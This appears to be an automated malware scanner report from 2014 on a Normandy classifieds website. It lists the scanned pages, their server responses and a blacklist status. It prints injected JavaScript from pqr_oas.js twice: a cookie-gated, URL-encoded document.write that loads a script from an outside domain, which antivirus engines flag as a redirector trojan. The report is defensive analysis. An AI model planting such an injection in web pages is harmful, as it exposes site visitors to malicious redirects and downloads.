Malware Scanner report for annonces-normandie.fr

Malicious/Suspicious/Total urls checked
2/4/19
6 pages have malicious or suspicious code. See details below.
Blacklists
Found
The website is marked by Google as suspicious.

The website "annonces-normandie.fr" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=annonces-normandie.fr

Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.

Scanned pages/files

Request | Server response | Status
http://annonces-normandie.fr/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 09:51:29 GMT
Location: http://www.annonces-normandie.fr/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 378
Content-Type: text/html; charset=iso-8859-1
clean
http://www.annonces-normandie.fr/
200 OK
Content-Length: 22749
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.annonces.paris-normandie.fr

...[1211 bytes skipped]...
ta name="y_key" content="" />
<meta name="msvalidate.01" content="" />
<link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" />
<link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss">
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" />
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" />
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" />
<script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script>

<script type="text/javascript"> ...[2803 bytes skipped]...

http://www.annonces.paris-normandie.fr/js/default_js.js
200 OK
Content-Length: 80104
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: www.annonces-normandie.fr

// centered popup function
function ouvrir(l,h,url) {
hauteur=Math.round((screen.availHeight-h)/2);
largeur=Math.round((screen.availWidth-l)/2);
window.open(url, "site"+l+h, "toolbar=0,location=0,directories=0,status=0, scrollbars=yes,resizable=0,menubar=0,top="+hauteur+",left="+largeur+",width="+l+",height="+h);
}

// object selection function
function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=docu
...[4206 bytes skipped]...

http://www.annonces.paris-normandie.fr/js/pqr_oas.js
200 OK
Content-Length: 1813
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' +
OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' +
... 979 bytes are skipped ...
pos);
else
OAS_NORMAL(pos);
}

if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));}

Antivirus reports:

Avast
JS:Includer-BGC [Trj]
Kaspersky
Trojan.JS.Redirector.adm
McAfee
JS/Redirector.co
AVG
JS/Redir
Symantec
Trojan.Malscript

http://www.annonces.paris-normandie.fr/js/fonctions.js
200 OK
Content-Length: 5782
Content-Type: application/x-javascript
clean
http://www.annonces.paris-normandie.fr/js/xiti.js
200 OK
Content-Length: 11791
Content-Type: application/x-javascript
clean
http://annonces-normandie.fr/?Copix=3ae7d275cf23e0727f1505e97bc6f79e
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 09:51:31 GMT
Location: http://www.annonces-normandie.fr/?Copix=3ae7d275cf23e0727f1505e97bc6f79e
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 417
Content-Type: text/html; charset=iso-8859-1
clean
http://www.annonces-normandie.fr/?copix=3ae7d275cf23e0727f1505e97bc6f79e
200 OK
Content-Length: 22792
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.annonces.paris-normandie.fr

...[1211 bytes skipped]...
ta name="y_key" content="" />
<meta name="msvalidate.01" content="" />
<link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" />
<link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss">
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" />
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" />
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" />
<script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script>

<script type="text/javascript"> ...[2803 bytes skipped]...

http://www.annonces-normandie.fr/?Copix=458557ff8acfada2b289dea8526bc83b
200 OK
Content-Length: 22749
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.annonces.paris-normandie.fr

...[1211 bytes skipped]...
ta name="y_key" content="" />
<meta name="msvalidate.01" content="" />
<link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" />
<link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss">
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" />
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" />
<link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" />
<script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script>

<script type="text/javascript"> ...[2803 bytes skipped]...

http://www.annonces-normandie.fr/vitrines/liste-professionnels?selectedMenu=120
200 OK
Content-Length: 26247
Content-Type: text/html
clean
http://www.annonces-normandie.fr/js/default_js.js
200 OK
Content-Length: 80104
Content-Type: application/x-javascript
clean
http://www.annonces-normandie.fr/js/pqr_oas.js
200 OK
Content-Length: 1813
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' +
OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' +
... 979 bytes are skipped ...
pos);
else
OAS_NORMAL(pos);
}

if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));}

Antivirus reports:

Avast
JS:Includer-BGC [Trj]
Kaspersky
Trojan.JS.Redirector.adm
McAfee
JS/Redirector.co
AVG
JS/Redir
Symantec
Trojan.Malscript

http://www.annonces-normandie.fr/js/fonctions.js
200 OK
Content-Length: 5782
Content-Type: application/x-javascript
clean
http://www.annonces-normandie.fr/js/xiti.js
200 OK
Content-Length: 11791
Content-Type: application/x-javascript
clean
http://www.annonces-normandie.fr/vitrines/?Copix=b8513612a78f109ce08769b10389c665
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 15 Sep 2014 09:51:34 GMT
Pragma: no-cache
Location: cms/6
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.14
clean
http://www.annonces-normandie.fr/vitrines/cms/6
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 15 Sep 2014 09:51:34 GMT
Pragma: no-cache
Location: cms/6
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: Copix=3f20c29d9232fa870f1083f725a9dacb; path=/
X-Powered-By: PHP/5.2.14
clean
http://www.annonces-normandie.fr/vitrines/cms/cms/6
200 OK
Content-Length: 1436
Content-Type: text/html
clean
http://www.annonces-normandie.fr/vitrines/cms/cms/function.array-merge
200 OK
Content-Length: 1436
Content-Type: text/html
clean
http://www.annonces-normandie.fr/vitrines/cms/cms/function.session-start
200 OK
Content-Length: 1436
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: annonces-normandie.fr

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 09:51:29 GMT
Location: http://www.annonces-normandie.fr/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 378
Content-Type: text/html; charset=iso-8859-1

...378 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: annonces-normandie.fr
Referer: http://www.google.com/search?q=annonces-normandie.fr

Result:
The result is similar to the first query. There are no suspicious redirects found.